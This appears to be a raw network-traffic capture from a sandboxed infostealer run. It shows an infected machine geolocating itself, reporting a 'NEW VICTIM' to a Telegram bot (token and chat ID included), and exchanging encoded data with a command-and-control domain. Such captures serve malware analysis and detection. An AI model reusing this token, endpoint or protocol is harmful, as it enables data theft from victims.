2024-12-22 01:21:52 UTC	1135	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:21:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=3poev0gvgbnh4tdpr9k7cibkb8; expires=Wed, 16 Apr 2025 19:08:31 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UNZK1%2FuSRn366G%2BSU%2F%2B0vNJGanw0SKfLkjvp4tIbkGCBVGSObg2IJNQsp%2FPGXPIScngKOyKEq26L4P4pBXmTPxOZYgsqdnx%2BA%2F1f8OU0kwU%2FgMbNVoi81nrEPhN21m0GogTpIQLO"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c4c2c0b2372a7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1977&min_rtt=1969&rtt_var=755&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=984&delivery_rate=1434889&cwnd=177&unsent_bytes=0&cid=42817de377f27b9f&ts=774&x=0"
2024-12-22 01:21:52 UTC	54	IN	Data Raw: 33 30 0d 0a 4b 32 4c 64 34 31 32 6c 32 35 34 6e 76 6c 72 30 59 31 6f 43 59 6a 71 45 64 74 4a 6f 6a 46 6c 63 55 32 5a 41 6e 4d 66 58 52 52 46 77 50 77 3d 3d 0d 0a Data Ascii: 30K2Ld412l254nvlr0Y1oCYjqEdtJojFlcU2ZAnMfXRRFwPw==
2024-12-22 01:21:52 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
87	192.168.2.4	50609	34.117.59.81	443

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:22:57 UTC	91	OUT	GET /json HTTP/1.1 User-Agent: IPInfoFetcher Host: ipinfo.io Cache-Control: no-cache
2024-12-22 01:22:57 UTC	345	IN	HTTP/1.1 200 OK access-control-allow-origin: * Content-Length: 321 content-type: application/json; charset=utf-8 date: Sun, 22 Dec 2024 01:22:57 GMT x-content-type-options: nosniff via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-22 01:22:57 UTC	321	IN	Data Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 38 39 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 31 30 30 30 31 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a Data Ascii: { "ip": "8.46.123.189", "hostname": "static-cpe-8-46-123-189.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone":

Session ID	Source IP	Source Port	Destination IP	Destination Port
88	192.168.2.4	50611	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:22:59 UTC	513	OUT	GET /bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=7427009775&text=%3Cb%3E%F0%9F%94%94NEW%20VICTIM%20%2D%20Extensions%20Installed%3C%2Fb%3E%0A%3Cb%3EIP%20Address%3A%3C%2Fb%3E%208%2E46%2E123%2E189%0A%3Cb%3EDevice%20Name%3A%3C%2Fb%3E%20715575%0A%3Cb%3ELocation%3A%3C%2Fb%3E%20New%20York%20City%2C%20New%20York%2C%20US%0A%3Cb%3EWallets%3A%3C%2Fb%3E%0A%3Ccode%3ENothing%20found%3C%2Fcode%3E&parse_mode=HTML HTTP/1.1 User-Agent: TelegramBot Host: api.telegram.org Cache-Control: no-cache
2024-12-22 01:22:59 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sun, 22 Dec 2024 01:22:59 GMT Content-Type: application/json Content-Length: 777 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-22 01:22:59 UTC	777	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 30 31 32 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 38 35 35 38 37 38 35 34 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 72 68 6a 64 66 74 6a 6b 77 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 72 68 6a 64 66 74 6a 6b 77 34 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 34 32 37 30 30 39 37 37 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 30 34 31 61 5c 75 30 34 33 30 5c 75 30 34 34 30 5c 75 30 34 33 34 5c 75 30 34 33 30 5c 75 30 34 33 64 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 30 34 31 32 5c 75 30 34 33 30 5c 75 30 34 33 62 5c 75 30 34 33 65 5c 75 30 34 33 32 22 Data Ascii: {"ok":true,"result":{"message_id":30127,"from":{"id":7855878545,"is_bot":true,"first_name":"srhjdftjkw4","username":"srhjdftjkw4_bot"},"chat":{"id":7427009775,"first_name":"\u041a\u0430\u0440\u0434\u0430\u043d","last_name":"\u0412\u0430\u043b\u043e\u0432"

Session ID	Source IP	Source Port	Destination IP	Destination Port
89	192.168.2.4	50614	104.21.89.115	443

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:23:01 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: fieldhitty.click
2024-12-22 01:23:01 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-22 01:23:02 UTC	1122	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:23:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=omisn0fbkkm2i5shbcdf0b30tp; expires=Wed, 16 Apr 2025 19:09:40 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=paN0HpiTVSeNZ9%2F2mtJHPT8RiOO2mjrNtA73lLhQdVMiifsv7PhX4ItzqYzzjsfEK7GCfOR%2BSwckmNB5%2F2bQSisC9zoeU9lAjt96Q8yyqEsQCpR5bbXUJEhlfa1v4tN4H6EL"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c4ddf2bd60f74-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3905&min_rtt=1495&rtt_var=2144&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=907&delivery_rate=1953177&cwnd=151&unsent_bytes=0&cid=dcf9d8ae93945f90&ts=783&x=0"
2024-12-22 01:23:02 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-22 01:23:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
90	192.168.2.4	50616	104.21.89.115	443

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:23:03 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 42 Host: fieldhitty.click
2024-12-22 01:23:03 UTC	42	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 76 62 41 72 5a 2d 2d 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=PvbArZ--&j=
2024-12-22 01:23:04 UTC	1120	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:23:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=3jvfp9uk989qgilgq1m3rck3hr; expires=Wed, 16 Apr 2025 19:09:42 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bbh7reyoi7DNSX4LtpavmbfNe8rnpoyjyiUEoKZ6vtTN%2BOFXQt11uDScpFCOGmLuUO6IExZDz2ZmLGfOAaBb2ahtPc%2FZrHtPbqvMEaZ%2F3vceMx1Wt28raSAGlGB7sTqLG1ZG"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c4debea25de99-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1482&min_rtt=1482&rtt_var=741&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4216&recv_bytes=942&delivery_rate=197004&cwnd=199&unsent_bytes=0&cid=edd956260a0c0b1e&ts=799&x=0"
2024-12-22 01:23:04 UTC	249	IN	Data Raw: 31 63 62 37 0d 0a 47 73 6d 55 31 4a 7a 4f 64 52 59 41 4b 79 57 4e 34 75 4d 2b 32 67 2b 63 44 50 4e 62 6e 52 48 4f 42 46 73 6b 67 78 73 70 4a 49 4a 68 36 2b 4c 32 70 76 70 5a 4e 48 4e 4f 42 37 65 57 6b 55 75 2f 49 37 35 74 6c 33 6d 6e 64 36 39 6f 4b 45 47 76 4f 56 39 4a 6f 43 43 76 39 62 6a 76 71 31 6b 30 5a 56 4d 48 74 37 6d 59 48 4c 39 68 76 6a 62 52 50 76 64 7a 72 32 67 35 52 65 68 30 57 55 6a 68 63 71 58 7a 76 50 6d 74 45 58 64 73 52 6b 44 6f 68 34 4a 55 74 47 62 78 5a 4a 35 35 73 54 4f 72 66 6e 6b 65 6f 56 5a 4d 55 4f 4e 58 71 4f 65 2f 76 72 4e 5a 62 53 4a 4f 53 36 2f 59 77 56 2b 2f 62 66 42 71 6c 7a 44 31 65 61 5a 67 4f 45 44 70 61 30 42 43 36 6e 4b 72 38 4c 33 7a 70 41 56 36 5a 6b 46 4c 37 6f 32 43 48 50 59 74 2b 58 62 52 59 62 38 Data Ascii: 1cb7GsmU1JzOdRYAKyWN4uM+2g+cDPNbnRHOBFskgxspJIJh6+L2pvpZNHNOB7eWkUu/I75tl3mnd69oKEGvOV9JoCCv9bjvq1k0ZVMHt7mYHL9hvjbRPvdzr2g5Reh0WUjhcqXzvPmtEXdsRkDoh4JUtGbxZJ55sTOrfnkeoVZMUONXqOe/vrNZbSJOS6/YwV+/bfBqlzD1eaZgOEDpa0BC6nKr8L3zpAV6ZkFL7o2CHPYt+XbRYb8
2024-12-22 01:23:04 UTC	1369	IN	Data Raw: 67 6e 6d 55 6f 56 2f 52 30 57 30 43 67 5a 2b 58 76 39 76 6d 67 56 79 77 69 51 55 76 68 68 59 4a 54 76 32 7a 2b 66 4a 34 35 2f 48 75 6b 59 6a 4e 4a 37 6e 5a 46 54 4f 64 77 6f 76 47 35 2b 61 51 52 65 32 45 4a 43 61 2b 48 6d 52 7a 67 4c 64 35 2b 6b 6a 72 72 66 72 30 6d 4a 67 6a 34 4f 55 78 4b 6f 43 44 72 38 4c 6a 2f 6f 52 64 6d 61 6b 4a 4d 36 70 4b 4b 56 62 56 67 2f 6d 4f 62 4e 76 78 7a 71 32 77 7a 53 65 74 39 52 6b 76 6d 65 4b 75 32 2b 4c 36 72 44 7a 51 36 43 57 54 71 6b 49 5a 51 72 69 2f 45 4c 6f 35 33 35 6a 4f 72 61 6e 6b 65 6f 58 46 4f 52 65 4e 7a 70 50 57 2b 39 62 34 58 5a 6d 52 45 51 76 32 47 68 46 4b 79 62 75 78 6b 6e 7a 2f 38 65 71 64 76 50 45 48 6c 4f 51 55 47 35 32 44 72 72 76 62 66 6f 52 78 34 61 46 35 48 72 35 2f 50 52 66 68 71 38 69 37 4a 65 66 Data Ascii: gnmUoV/R0W0CgZ+Xv9vmgVywiQUvhhYJTv2z+fJ45/HukYjNJ7nZFTOdwovG5+aQRe2EJCa+HmRzgLd5+kjrrfr0mJgj4OUxKoCDr8Lj/oRdmakJM6pKKVbVg/mObNvxzq2wzSet9RkvmeKu2+L6rDzQ6CWTqkIZQri/ELo535jOrankeoXFOReNzpPW+9b4XZmREQv2GhFKybuxknz/8eqdvPEHlOQUG52DrrvbfoRx4aF5Hr5/PRfhq8i7Jef
2024-12-22 01:23:04 UTC	1369	IN	Data Raw: 64 77 62 6d 59 51 73 65 6f 46 4b 6f 34 72 58 30 37 69 4a 33 62 45 64 41 2b 63 43 65 45 71 45 74 2b 57 4c 52 59 62 39 2b 72 57 34 2f 56 4f 35 30 53 45 6a 75 64 36 37 35 76 76 36 73 47 6e 46 6d 51 6b 7a 73 6a 59 56 4f 73 6d 33 32 61 35 41 7a 39 54 50 69 4a 6a 35 65 6f 53 45 4c 64 2f 64 7a 36 63 4f 31 38 4b 49 51 59 69 4a 57 43 66 62 41 68 6c 44 34 4e 62 35 6a 6d 54 7a 36 66 4b 31 73 4e 30 50 72 64 55 4e 49 34 32 71 6b 38 72 62 79 70 42 31 35 62 45 31 50 35 6f 75 4b 57 72 68 73 39 43 37 66 65 66 68 72 37 44 35 35 63 75 5a 31 52 6b 6d 69 54 61 6a 34 75 50 6d 36 56 32 73 73 55 41 66 6f 6a 4d 45 45 2b 47 48 33 62 70 6f 7a 2b 33 4f 72 61 7a 78 46 35 6e 70 47 51 65 70 32 72 50 4b 36 39 36 45 52 64 47 56 4e 51 76 32 46 69 46 43 30 4c 62 41 75 6c 69 47 2f 4b 2b 78 Data Ascii: dwbmYQseoFKo4rX07iJ3bEdA+cCeEqEt+WLRYb9+rW4/VO50SEjud675vv6sGnFmQkzsjYVOsm32a5Az9TPiJj5eoSELd/dz6cO18KIQYiJWCfbAhlD4Nb5jmTz6fK1sN0PrdUNI42qk8rbypB15bE1P5ouKWrhs9C7fefhr7D55cuZ1RkmiTaj4uPm6V2ssUAfojMEE+GH3bpoz+3OrazxF5npGQep2rPK696ERdGVNQv2FiFC0LbAuliG/K+x
2024-12-22 01:23:04 UTC	1369	IN	Data Raw: 53 45 4c 54 2b 6c 71 70 66 69 2f 38 36 6f 66 63 32 78 45 54 4f 6d 4c 68 6c 75 2b 59 50 5a 6a 6c 44 72 2b 64 36 5a 30 4f 6b 33 72 64 45 45 47 72 6a 69 73 37 76 61 6d 37 44 42 34 53 31 6c 63 2f 5a 62 42 51 2f 5a 30 76 6d 6d 64 65 61 63 7a 72 32 6b 77 53 65 6c 78 52 45 6e 6b 64 71 33 77 75 2f 75 6a 48 57 5a 71 52 30 72 6b 6a 34 70 4f 75 47 44 36 59 70 55 78 39 48 6e 73 4b 48 6c 42 2b 54 6b 54 42 74 56 31 70 50 61 31 36 4f 77 49 4f 6e 73 4a 51 4f 50 41 32 52 79 30 59 2f 35 68 6e 54 58 30 65 36 31 71 4e 30 48 6b 63 45 4e 4f 38 6e 6d 76 2f 72 66 77 6f 78 5a 77 5a 30 78 44 36 49 53 48 55 2f 67 6a 76 6d 6d 4a 65 61 63 7a 67 30 45 4d 42 4d 42 44 43 31 6d 75 59 65 76 78 75 72 37 30 56 33 68 68 52 55 2f 67 68 6f 68 51 73 6d 54 31 59 70 6f 39 38 33 71 70 59 44 68 44 Data Ascii: SELT+lqpfi/86ofc2xETOmLhlu+YPZjlDr+d6Z0Ok3rdEEGrjis7vam7DB4S1lc/ZbBQ/Z0vmmdeaczr2kwSelxREnkdq3wu/ujHWZqR0rkj4pOuGD6YpUx9HnsKHlB+TkTBtV1pPa16OwIOnsJQOPA2Ry0Y/5hnTX0e61qN0HkcENO8nmv/rfwoxZwZ0xD6ISHU/gjvmmJeaczg0EMBMBDC1muYevxur70V3hhRU/ghohQsmT1Ypo983qpYDhD
2024-12-22 01:23:04 UTC	1369	IN	Data Raw: 48 70 61 71 58 37 75 66 61 6b 48 6e 56 6d 54 45 72 70 6a 49 74 64 76 32 50 77 5a 74 46 33 76 33 53 30 4a 6d 45 47 77 47 6c 51 56 50 5a 31 69 76 75 35 76 72 4e 5a 62 53 4a 4f 53 36 2f 59 77 56 57 71 61 66 4e 38 6d 44 37 78 66 4b 39 30 4f 45 76 71 61 30 78 4a 35 48 2b 6e 38 4c 6e 34 72 52 4a 2b 62 6b 35 43 35 49 2b 4e 48 50 59 74 2b 58 62 52 59 62 39 64 70 33 55 75 52 65 39 79 58 56 32 67 5a 2b 58 76 39 76 6d 67 56 79 77 69 53 6b 7a 6b 68 49 46 51 75 47 6e 7a 62 6f 4d 32 2b 48 53 6c 62 53 74 4d 35 6e 35 41 54 75 74 33 72 65 53 36 38 4c 34 53 5a 6e 41 4a 43 61 2b 48 6d 52 7a 67 4c 63 68 70 67 53 6e 38 4d 5a 31 77 4f 6c 44 71 64 45 63 47 2f 7a 61 79 74 72 48 79 37 45 38 30 5a 45 5a 4f 37 49 2b 41 56 62 52 67 2b 32 65 55 4f 50 6c 33 70 6d 77 35 51 4f 64 34 54 Data Ascii: HpaqX7ufakHnVmTErpjItdv2PwZtF3v3S0JmEGwGlQVPZ1ivu5vrNZbSJOS6/YwVWqafN8mD7xfK90OEvqa0xJ5H+n8Ln4rRJ+bk5C5I+NHPYt+XbRYb9dp3UuRe9yXV2gZ+Xv9vmgVywiSkzkhIFQuGnzboM2+HSlbStM5n5ATut3reS68L4SZnAJCa+HmRzgLchpgSn8MZ1wOlDqdEcG/zaytrHy7E80ZEZO7I+AVbRg+2eUOPl3pmw5QOd4T
2024-12-22 01:23:04 UTC	1369	IN	Data Raw: 73 2b 76 61 6d 37 42 52 7a 59 55 68 4e 35 6f 79 4f 57 37 78 2f 39 47 6d 44 4f 50 35 34 6f 57 6f 35 53 2b 78 7a 53 6b 2f 74 64 4b 62 78 73 66 47 70 56 7a 6f 69 54 6c 2b 76 32 4d 46 39 74 57 62 79 4e 63 74 35 34 44 32 31 4a 6a 35 4b 6f 53 45 4c 52 75 70 39 6f 66 75 31 38 61 38 46 64 57 52 62 52 2b 4b 4b 6b 31 61 7a 61 50 4e 6a 6e 44 72 35 64 61 64 71 4b 30 2f 68 65 6b 41 47 72 6a 69 73 37 76 61 6d 37 44 52 6a 64 45 4e 41 34 35 61 4b 58 62 74 37 38 33 37 52 64 37 39 69 71 33 64 35 48 76 64 70 58 45 48 2f 4e 72 4b 32 73 66 4c 73 54 7a 52 6b 51 45 48 6f 68 6f 39 4f 76 57 76 78 59 5a 67 77 2b 33 75 76 5a 6a 31 43 35 6e 78 49 53 75 74 2f 71 50 6d 79 39 36 49 65 65 79 49 48 42 2b 69 59 77 51 54 34 54 4f 56 74 6e 54 53 2f 62 4f 4a 2f 65 55 48 74 4f 52 4d 47 37 48 Data Ascii: s+vam7BRzYUhN5oyOW7x/9GmDOP54oWo5S+xzSk/tdKbxsfGpVzoiTl+v2MF9tWbyNct54D21Jj5KoSELRup9ofu18a8FdWRbR+KKk1azaPNjnDr5dadqK0/hekAGrjis7vam7DRjdENA45aKXbt7837Rd79iq3d5HvdpXEH/NrK2sfLsTzRkQEHoho9OvWvxYZgw+3uvZj1C5nxISut/qPmy96IeeyIHB+iYwQT4TOVtnTS/bOJ/eUHtORMG7H
2024-12-22 01:23:04 UTC	265	IN	Data Raw: 36 4b 6b 51 59 69 42 38 52 4f 47 4f 68 6b 72 34 63 73 45 67 30 54 62 6c 4d 2f 52 66 49 41 62 6d 64 51 73 65 6f 47 32 73 39 72 48 6b 75 68 42 34 63 30 4a 4b 34 36 4b 4f 57 36 35 75 38 57 32 41 4d 4c 4e 34 6f 53 5a 33 42 75 5a 68 43 78 36 67 56 36 7a 67 74 64 47 76 42 6e 30 69 42 77 66 6f 6c 73 45 45 2b 46 4f 2b 66 4a 49 70 2f 48 79 39 57 48 6b 65 2b 45 63 4c 54 66 5a 2f 75 2f 57 67 39 61 45 62 5a 56 77 4a 48 37 76 53 30 77 37 71 50 2b 45 75 6a 67 61 78 4d 36 30 6d 59 58 2f 34 4f 56 30 47 75 43 72 6c 74 71 53 2b 39 46 63 7a 59 56 74 56 36 59 4f 58 58 2f 39 54 77 45 6d 48 4d 2f 68 6a 71 33 45 32 42 71 38 35 52 41 61 34 51 65 76 2f 73 65 57 39 41 58 6c 79 54 67 66 51 7a 73 46 45 2b 44 57 2b 57 35 49 33 38 58 53 36 64 33 52 68 39 33 4e 4d 56 75 64 76 70 4c 62 Data Ascii: 6KkQYiB8ROGOhkr4csEg0TblM/RfIAbmdQseoG2s9rHkuhB4c0JK46KOW65u8W2AMLN4oSZ3BuZhCx6gV6zgtdGvBn0iBwfolsEE+FO+fJIp/Hy9WHke+EcLTfZ/u/Wg9aEbZVwJH7vS0w7qP+EujgaxM60mYX/4OV0GuCrltqS+9FczYVtV6YOXX/9TwEmHM/hjq3E2Bq85RAa4Qev/seW9AXlyTgfQzsFE+DW+W5I38XS6d3Rh93NMVudvpLb
2024-12-22 01:23:04 UTC	1369	IN	Data Raw: 32 63 36 35 0d 0a 48 42 2b 75 52 77 51 54 6f 50 36 55 37 77 6d 36 76 49 62 4d 6f 49 41 62 33 4f 52 4d 55 72 6a 69 35 74 75 36 2b 36 78 52 6d 63 45 39 45 2b 59 50 47 59 6f 5a 4b 35 47 4f 58 4c 75 35 4e 6b 6d 45 6a 53 2b 64 75 57 67 72 31 65 36 58 34 73 65 6a 73 57 54 52 74 43 52 2f 57 77 4d 6b 63 68 79 4f 2b 64 74 46 68 76 30 61 76 61 44 64 42 39 32 67 47 59 66 70 31 72 65 47 6e 76 75 4a 58 63 69 49 52 46 36 48 41 68 55 33 34 4e 61 34 38 79 6d 79 73 4a 50 77 30 4a 67 6a 34 4f 56 30 47 75 43 72 6c 74 71 53 2b 39 46 63 7a 59 56 74 56 36 59 4f 58 58 2f 39 54 77 45 43 57 50 2f 70 30 76 43 51 58 54 66 56 2b 43 77 69 67 64 2b 75 75 6a 37 37 6b 56 30 73 73 43 56 2b 76 32 4d 46 70 75 32 50 77 61 59 63 6f 73 6c 32 72 59 44 78 42 38 54 74 6c 54 66 52 2f 36 37 6a 32 Data Ascii: 2c65HB+uRwQToP6U7wm6vIbMoIAb3ORMUrji5tu6+6xRmcE9E+YPGYoZK5GOXLu5NkmEjS+duWgr1e6X4sejsWTRtCR/WwMkchyO+dtFhv0avaDdB92gGYfp1reGnvuJXciIRF6HAhU34Na48ymysJPw0Jgj4OV0GuCrltqS+9FczYVtV6YOXX/9TwECWP/p0vCQXTfV+Cwigd+uuj77kV0ssCV+v2MFpu2PwaYcosl2rYDxB8TtlTfR/67j2
2024-12-22 01:23:04 UTC	1369	IN	Data Raw: 51 6c 53 6c 58 39 68 6f 4a 4b 75 79 72 41 55 4c 59 33 2b 48 4b 36 64 69 35 4a 72 6c 64 39 5a 39 35 47 76 76 57 34 38 4b 73 42 5a 53 49 48 42 2b 44 41 32 57 58 34 4a 62 35 52 33 33 6e 6e 4d 2f 51 6d 44 45 58 76 64 30 78 51 38 54 57 4d 2b 4c 48 2f 75 67 64 6a 62 51 5a 70 32 61 48 42 45 76 68 72 76 6a 62 44 64 37 39 33 76 53 5a 68 46 72 4d 69 48 68 57 33 4b 50 6e 70 2b 4f 66 73 41 54 51 36 47 77 6d 76 6b 73 45 45 2b 43 72 39 66 49 4d 2f 2f 47 57 76 49 51 64 34 78 6e 64 4d 52 2f 5a 6f 70 76 71 58 2f 62 30 64 53 6c 78 63 52 4f 47 4f 68 6b 71 70 4c 62 41 75 6e 6e 6d 6e 53 75 77 75 65 58 6d 76 4f 56 4d 47 75 44 69 65 39 62 6a 77 71 77 46 6c 4c 32 35 4a 36 49 47 58 54 4c 56 68 33 32 32 41 4d 37 38 39 37 47 42 35 48 72 4d 33 43 30 4c 78 4f 50 4f 6d 35 4b 58 35 52 Data Ascii: QlSlX9hoJKuyrAULY3+HK6di5Jrld9Z95GvvW48KsBZSIHB+DA2WX4Jb5R33nnM/QmDEXvd0xQ8TWM+LH/ugdjbQZp2aHBEvhrvjbDd793vSZhFrMiHhW3KPnp+OfsATQ6GwmvksEE+Cr9fIM//GWvIQd4xndMR/ZopvqX/b0dSlxcROGOhkqpLbAunnmnSuwueXmvOVMGuDie9bjwqwFlL25J6IGXTLVh322AM7897GB5HrM3C0LxOPOm5KX5R

Session ID	Source IP	Source Port	Destination IP	Destination Port
91	192.168.2.4	50618	104.21.89.115	443

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:23:05 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=EVLG9F4FKD User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18110 Host: fieldhitty.click
2024-12-22 01:23:05 UTC	15331	OUT	Data Raw: 2d 2d 45 56 4c 47 39 46 34 46 4b 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 45 56 4c 47 39 46 34 46 4b 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 45 56 4c 47 39 46 34 46 4b 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 76 62 41 72 5a 2d 2d 0d 0a 2d 2d 45 56 4c 47 39 46 34 46 4b 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f Data Ascii: --EVLG9F4FKDContent-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--EVLG9F4FKDContent-Disposition: form-data; name="pid"2--EVLG9F4FKDContent-Disposition: form-data; name="lid"PvbArZ----EVLG9F4FKDContent-Dispo
